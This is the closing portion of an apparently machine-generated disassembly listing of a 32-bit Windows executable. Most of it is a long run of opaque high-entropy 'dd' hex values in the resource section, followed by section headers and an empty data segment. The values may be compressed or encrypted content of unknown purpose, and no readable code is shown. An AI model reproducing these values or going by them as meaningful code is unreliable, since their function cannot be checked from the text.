dd 0FDF05E33h, 1E8F31Ah, 83B431FEh, 0FD924E73h, 9DDFF90Fh
dd 9A5D6992h, 0D5BC875Ah, 49AAA812h, 6C61F8DEh, 2148D30Eh
dd 0F02C771Eh, 0E3366B60h, 8D209663h, 0D15365AAh, 3229E2F2h
dd 0D6A04B22h, 8A2E6F89h, 815C825Fh, 0A4CC17BEh, 0B95B8E02h
dd 0C4B155A6h, 0DB98637Eh, 6D1A88C5h, 1CCAAB31h, 1DE4FB3Fh
dd 0E0B8F89Ch, 7469C0F4h, 2970DB16h, 0F8D47D86h, 203D3445h
dd 0F51CE7FAh, 2CE00F52h, 37845F2Ch, 0C11C581Fh, 55295D7Eh
dd 810FBF6h, 15920F46h, 81F3626Ch, 2534ACEEh, 52052132h
dd 7764CFE2h, 95F9964Dh, 5ACF75Eh, 0F9455BEAh, 0A5178720h
dd 0E5522620h, 1EBA67CEh, 114BCAA2h, 780EE746h, 41A80770h
dd 14C96094h, 89D03BB6h, 0DCB4CF66h, 973DD6BFh, 5F048416h
dd 7974C197h, 0AE8F2996h, 0DCA179BAh, 0C52C8E54h, 9DC19E55h
dd 0D54FF46h, 8E4D43CAh, 6E7750FFh, 0C16933B4h, 89EECABCh
dd 0E568F35Ah, 0CFA95DFDh, 2F907B76h, 0A7C9B68Dh, 3BD823B3h
dd 9F194DAFh, 9F00EBCBh, 5FBCBFFDh, 617CBABFh, 0DBDD9Eh
dd 69F0EF53h, 0CC14BFC5h, 517F87A5h, 52E4E70Eh, 1206C0F6h
dd 3DB01EFBh, 0C19932DAh, 52CE17BEh, 950FBC3h, 55312AE5h
dd 5F1F472Dh, 0D57C3F85h, 12A66BB2h, 0A5C2C963h, 4A6EB671h
dd 0CA8B53E6h, 0E9433024h, 823D4E0h, 11F8F75Bh, 0F41CA7CEh
dd 0DC174B27h, 3D04DB07h, 8928739Ah, 0DDEAF10Ah, 4CE7D74Fh
dd 0ADB42B97h, 3358E30Ah, 9FFDD2E1h, 0FD2B4D93h, 0BB6CFA1Fh
dd 0C7CC3702h, 0B5BF1CB5h, 0E7DBF1EAh, 10CC8720h, 0E5530628h
dd 1EBA67CEh, 0D010C8F9h, 0CC81585Ch, 41E8736Eh, 51CC973Eh
dd 0A3D7CBA2h, 2D80F6E3h, 0EBF862CAh, 71F48EA3h, 10E5E932h
dd 5D240FA2h, 0A508D09Eh, 0A4DC1CDAh, 56487D08h, 24F1F5E6h
dd 0F73803DEh, 4419D0E5h, 0F960CBE6h, 0C9C46FB6h, 302D0449h
dd 0E50C17CAh, 3DB03B42h, 2EB3682Bh, 0C5D8638Ah, 0BF2C776Bh
dd 3E8B5819h, 646682DDh, 0E063937Ah, 35D03617h, 4035D13Ah
dd 6714FFF2h, 65C9865Dh, 355CE74Eh, 95544BD2h, 0BED49710h
dd 0F54136D0h, 0AF2717FEh, 0E9AF4364h, 0D91DFAECh, 0DAFE230Ah
dd 0E14D02D9h, 0B9C36BF2h, 6ED0CE16h, 0D539D60Dh, 45EC371Eh
dd 2404BB22h, 8DD7B871h, 14CCC36Ah, 1EB6377Eh, 0D22F80A1h
dd 7D7D75B3h, 8E0589Ah, 0ACBF2B36h, 0FD213E35h, 0ADF41FE6h
dd 3F2DE38Ah, 0A115C263h, 710A2B32h, 0DE9D0F96h, 0A545EBC9h
dd 1588B3D3h, 0E1D09AE2h, 0AE3FB4F6h, 0E0C0E52Ch, 0D377014Eh
dd 712044AAh, 0FD04AF4Eh, 0EA8ED258h, 0ECC93C66h, 31B67DF7h
dd 0C6D21F57h, 7CB2607Ah, 15C83B2Bh, 8C51C32h, 9D240FA2h
dd 1498D37Ah, 3D47E0D8h, 22E9F0FAh, 0F57FD755h, 1CB393C1h
dd 75DC1EECh, 0E0E21ED3h, 84C56FF6h, 58CB791h, 0F561EA77h
dd 0F41B3B02h, 2D34A6A0h, 885AE6A1h, 904BC72Eh, 0F9409FC3h
dd 5DE40F16h, 0F9BF914Eh, 8528B535h, 0D4338C34h, 0CD548668h
dd 887C0CAAh, 0DD5CE70Fh, 99204B9Fh, 33D66A3Dh, 0F35BFF9Fh
dd 0E9805390h, 81C50402h, 64341FD3h, 31A19DCFh, 8DF7D42Eh
dd 4618688Eh, 5E2FE765h, 17F4BBCEh, 0D067C8A1h, 2930A284h
dd 81967CDDh, 287A46E3h, 0B71FA78Eh, 9F65825Ah, 0B644AF0Fh
dd 32D75BE9h, 658CD7FEh, 36E66E2Ah, 0B499459h, 6758A333h
dd 6ACA8E06h, 0DF15A08Dh, 5664CFEFh, 0EBCB1BF0h, 8662DC12h
dd 613F5E0Bh, 4D943E26h, 0D0220725h, 0DF678Eh, 19E0F2B8h
dd 0C4761AF5h, 7D44331Ah, 87C998D6h, 4D07B82h, 0E89FDB20h
dd 0F1589AB8h, 0BDAC01ADh, 0C6BF1DB4h, 0A482F215h, 1488D33Ah
dd 0C92B8CD5h, 0A8EB98ADh, 1BFFF06h, 0A89ED6D3h, 0F093270Eh
dd 0D9608ADFh, 84B6EAB5h, 80CEF35Ah, 0EA29A8C6h, 4990C7C7h
dd 2F341426h, 0E1EC20A1h, 0EA4A8E86h, 5FBD920Dh, 52E44F6Fh
dd 214877BFh, 2FA9749Eh, 6AB09B5Bh, 8D2DCD43h, 7AF888AAh
dd 0B753EB49h, 99204B5Fh, 728C684Dh, 0C1687759h, 0A70C94BEh
dd 0A44BC01h, 0AD0D2D63h, 8EC8714Ah, 9545399Bh, 0F15594B2h
dd 47A48F23h, 6407937Fh, 45EC37E9h, 297007CBh, 822B4386h
dd 11B857EFh, 0E02227CEh, 596B8E5Dh, 7BCFEF36h, 0B56B589Bh
dd 90543F2Eh, 7429443Dh, 0ADB42600h, 0B45B947Fh, 957C7E44h
dd 40F2AE71h, 58ED8F96h, 0A1882A70h, 8097F795h, 0E9706220h
dd 0C8AF3734h, 0D138BAECh, 0B5E10EFCh, 6BD0CB12h, 0FD1B47C1h
dd 0F65335Ah, 0E8D1CC2h, 99927880h, 547E5A5Dh, 0FD6DA38Ah
dd 0AAECC32Dh, 1D046403h, 86CF2E8Ah, 0F30D5CB9h, 0A56CF7E7h
dd 9082AE29h, 7BBCFF46h, 0F0C7BC1Ch, 759C27E7h, 0F26EFE52h
dd 0B4B663F1h, 0EA0B421h, 1AF36B7Ch, 0CC9F72BDh, 0D28B6194h
dd 30FC5F01h, 1598F6C9h, 6FF54F2h, 0DCD8E429h, 2128B770h
dd 0B662979Eh, 4DBC50A2h, 0F4BA3A41h, 0E87503EAh, 355CC33Bh
dd 0A052CE91h, 0D8E22F36h, 743FD7Fh, 8ED855BDh, 4F96F740h
dd 6CF3B71Dh, 71982318h, 0D57C872Bh, 0E63C2D3Bh, 0A8290C48h
dd 0E1486BB4h, 3979C808h, 0AA70DB17h, 9DB807Eh, 11B8C3D1h
dd 0CC4E2247h, 598A0B12h, 89D11060h, 42833AFh, 0C108D8BEh
dd 0E210BBC2h, 0C7A44F66h, 3032B309h, 953C4786h, 0EC7F7DB2h
dd 0DD24BA8Ah, 0AE37EB39h, 5A9C99Ah, 0BFB5D2E2h, 0C0947F7Fh
dd 9141D9A7h, 0D749EA8Eh, 48A08B2Bh, 0AD04C5A4h, 746CA6A5h
dd 0DDCF977Eh, 8554747Dh, 7B4DF63h, 0A7AD5CCAh, 0AAFC4797h
dd 79756BA7h, 62DCCC96h, 657D5775h, 40E5B7DEh, 0A9B022C8h
dd 0CE573635h, 0FB6913BBh, 0C063764Ah, 0D920B284h, 88A4FA49h
dd 0C12DF35Ah, 0E1DDD3F1h, 80A33B42h, 141A1AAFh, 0E08963CAh
dd 15A3AF3Fh, 650ABFDh, 1DD1AFC3h, 2E88163Ah, 8528FD1Ah
dd 1B355262h, 0E14FFFFh, 5191CE12h, 0D176C0Eh, 0AD11CE65h
dd 7D842F36h, 0C71DA3DAh, 0B5A192BDh, 0DB63FB42h, 1CC39EE5h
dd 0F411C2BDh, 0D53CBE54h, 0B9E4500Ah, 21EF4416h, 0F165D6F9h
dd 97DF371Eh, 0D8875A21h, 85D9E71h, 11F8FA1Ch, 0BEABA80Dh
dd 6C03F254h, 325CBCBBh, 823C302Dh, 0A4E79EAEh, 48C0B8EAh
dd 0C483409Ch, 2C2C1A64h, 94303D6Dh, 320BCB00h, 0C92604EAh
dd 2CD851B9h, 0F253BF5Ah, 0D2F1783Bh, 0DAD55C3h, 85F3402Ah
dd 75EF77AAh, 1918499Dh, 76C7AFF6h, 0CCE3D895h, 6574D983h
dd 565B8782h, 51181655h, 0CD1ED1ABh, 79FE70D4h, 657C4112h
dd 0B318A3E2h, 61B40E0Eh, 0C8F5FABh, 0ECCD1A29h, 7954BA5Eh
dd 0D26B7EE1h, 0F093271Ch, 269F74E1h, 0EAF96C3Dh, 0EEBBD53h
dd 1AF3717Ah, 0AC706BDh, 0A97BD173h, 4E279C91h, 26FF9053h
dd 0E984A4C0h, 601BF0A9h, 6E1CC06Ah, 7A29F391h, 0B283249Dh
dd 32EA922Eh, 0A97C0C55h, 6A318F0h, 9936A340h, 126C2F76h
dd 29974C25h, 0A5CC17BEh, 83BD7A5Fh, 4341FC9h, 71982077h
dd 5E4E784Ah, 0F9F91907h, 3F2DAB16h, 0AC36D29Ch, 63693804h
dd 0A2709B21h, 53D743D8h, 4183420Ch, 0E399A88Bh, 0AEE00B51h
dd 1D44F975h, 427739Ah, 658CD477h, 0CB4CF834h, 0A2D4512Dh
dd 315A1F8Eh, 1430A4EEh, 79812A8Bh, 33E280D6h, 49C813B8h
dd 0FA5309D3h, 0EBD3D9EDh, 71F3F46h, 0DD32803Ah, 0B4DC6736h
dd 0F7489A12h, 0CDFB501Ch
dd 1DC1CCFh, 156C263Eh, 0C9E44B37h, 9394B566h, 0E560FB03h
dd 0AA16D346h, 36926ECDh, 7FF78D02h, 55B9464Bh, 2087B79Eh
dd 0A9F01DCAh, 0B3CA606h, 0C93843EAh, 8A7693A6h, 0F0E5012Dh
dd 3BC42F82h, 3581D99Eh, 608457BEh, 49D00F6Bh, 0A8837FC4h
dd 0B19857BBh, 15BCC766h, 4480A287h, 5DA43B7Dh, 0D68DE73Bh
dd 0C518461Bh, 69B0D862h, 4D0FCBC7h, 11CC2A17h, 8528E20Eh
dd 0AD0AF612h, 9812F36h, 0EAD5337Dh, 0A0CC578Ah, 8CA76576h
dd 0ED746BD7h, 0F198234Ah, 68FC8E5Ah, 0B9805F9Bh, 9E2DB814h
dd 0A131FD5Fh, 0CA04375Eh, 0C18F64D6h, 722B8246h, 11BAE682h
dd 83812CCEh, 0B1E04B6Bh, 0C2BB13E8h, 8323F795h, 0D007D77Eh
dd 0C95082B0h, 0AEC8412Dh, 0CC870BD4h, 1733B811h, 79802A87h
dd 0BD40C557h, 2A2813BAh, 6FAA5E0h, 93334F98h, 7C11C856h
dd 0D178C31Eh, 0C0CC678Eh, 2515461Ch, 7604EFC2h, 1F85ED7h
dd 72E8643Eh, 89D9743Bh, 6D015266h, 218E3DAh, 0B6FCB60Bh
dd 0CEE41830h, 0DD107E13h, 6188D37Ah, 6DE8B8CEh, 56F01BA2h
dd 62BCD775h, 1AC7BC1Bh, 35A581DBh, 0D6B20ED2h, 0BDC4FD32h
dd 731D781Ah, 6E0C17C7h, 3112B08h, 2D74FF02h, 0B992486Ah
dd 0DC8FC51Dh, 0C214D9F1h, 1DF462DBh, 4CC5183Ah, 0F72C378Eh
dd 4D8C5034h, 0DD791A45h, 0D2F803EAh, 355C8AA9h, 0E3AB4B92h
dd 75CE2E7Eh, 36EF44D9h, 9C4A9235h, 8CA7FB42h, 0ED746BD7h
dd 7198230Ah, 0CD8B855Ah, 90CC19B1h, 0B3114626h, 6A0813C3h
dd 75ED1F2Dh, 1D411ED5h, 8D947FC6h, 13CCC36Ah, 1D4DBF39h
dd 0A61FF7E6h, 3E48046Fh, 0F3035BE9h, 96DA8672h, 4449E466h
dd 0EDC02313h, 6EFC100Ah, 70D48B0h, 7852ACFFh, 485E8FD6h
dd 0A1882795h, 0D7C5F16Bh, 0FB040D9Ah, 0A56B6FCEh, 2E875CE6h
dd 0B996ECD4h, 0EEB08111h, 0BD309E73h, 41E8335Ah, 230D1A2Eh
dd 45968F7h, 6DF4E6C8h, 0E17526C9h, 0F27F07EEh, 3940EB5Fh
dd 0B5676496h, 58F66685h, 42E5B79Eh, 0A9F01BF0h, 0FA74B989h
dd 0D10C726Fh, 759C274Eh, 8B67FF52h, 423D485Eh, 8C23A9E5h
dd 0E54C6E50h, 21938A1h, 3D3E140Eh, 88AEE601h, 5F85C72Eh
dd 7003D8FAh, 1FE5071Ch, 792B102Ah, 0FFA9FC9Eh, 1B09B5Bh
dd 0CD149BFAh, 8F041ABh, 0BF0CA40Fh, 0D9146407h, 4C01D876h
dd 0C168F3EEh, 0D1DC17BEh, 64DDF804h, 5B341FF6h, 401DD44Ah
dd 0D57CC71Ah, 0CCC069B2h, 0EA623102h, 0A13C627Fh, 41EC375Eh
dd 0A376EE22h, 0CDE04F33h, 203D346Ah, 0F51CE7FAh, 2CE00B12h
dd 3F43653Dh, 572AD958h, 6C67209Ch, 0B22BC48h, 4F221D0Ch
dd 558AD0FDh, 1A586565h, 0C4037370h, 0DD24B680h, 294C1CBAh
dd 0FA5308E5h, 0A9092957h, 8901C046h, 2E78C31Fh, 0F5E5093Bh
dd 25353412h, 7004EFC3h, 1D169D7h, 47D91A3Eh, 0D8D03BBBh
dd 92B4B534h, 0B121F57Fh, 0ED69F8AEh, 0C640AB07h, 0DD1D1923h
dd 5D1D2C7Ah, 486CF7EBh, 0E9C85517h, 5FE10006h, 0C73803D3h
dd 4028B2B1h, 7CE38B92h, 0BD8456E0h, 140301Ah, 0B80C57FEh
dd 0A4113A28h, 2D34AC6Fh, 70D793D2h, 55A947EBh, 3AC02EF2h
dd 0AD1BC7D5h, 0A1CD5235h, 462C378Bh, 43B0CB5Fh, 0AB08CAC6h
dd 5DDC7F2Bh, 26299662h, 66E4A3F2h, 78F1D089h, 3E93CD32h
dd 5A1EFF41h, 273104FDh, 0BB4C7219h, 5420317Eh, 0B57C872Eh
dd 463FCE5Ah, 969DBAE9h, 6C3877BEh, 5D479EBh, 21201022h
dd 8BEEFEE0h, 479DB068h, 0A1CA7A6h, 33248052h, 0C214BD36h
dd 0C11D8B0Fh, 6D48547Eh, 0F64C8543h, 0AE814399h, 0D95C2589h
dd 6AC3BCC5h, 867F549Ah, 65A7EE29h, 0A1C813CEh, 2A1446F5h
dd 1305BE2h, 4D943F56h, 6978A3E8h, 0B5DC67BEh, 19A0C8FAh
dd 0FD206DF6h, 4DCC67D7h, 0DDCFB9F3h, 0E9C90782h, 6DB4DF8Eh
dd 0D54C28CAh, 4F775A9Eh, 0D5306B3h, 0A4CC4FD6h, 772C9Fh
dd 0C46CB31Ch, 0ACF719A4h, 2DB65205h, 52E60B66h, 0ED8DA9B8h
dd 3DADh, 58h dup(0)
dd 1280h dup(?)
_rsrc ends
; Section 3. (virtual address 0003C000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00037600
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 43C000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start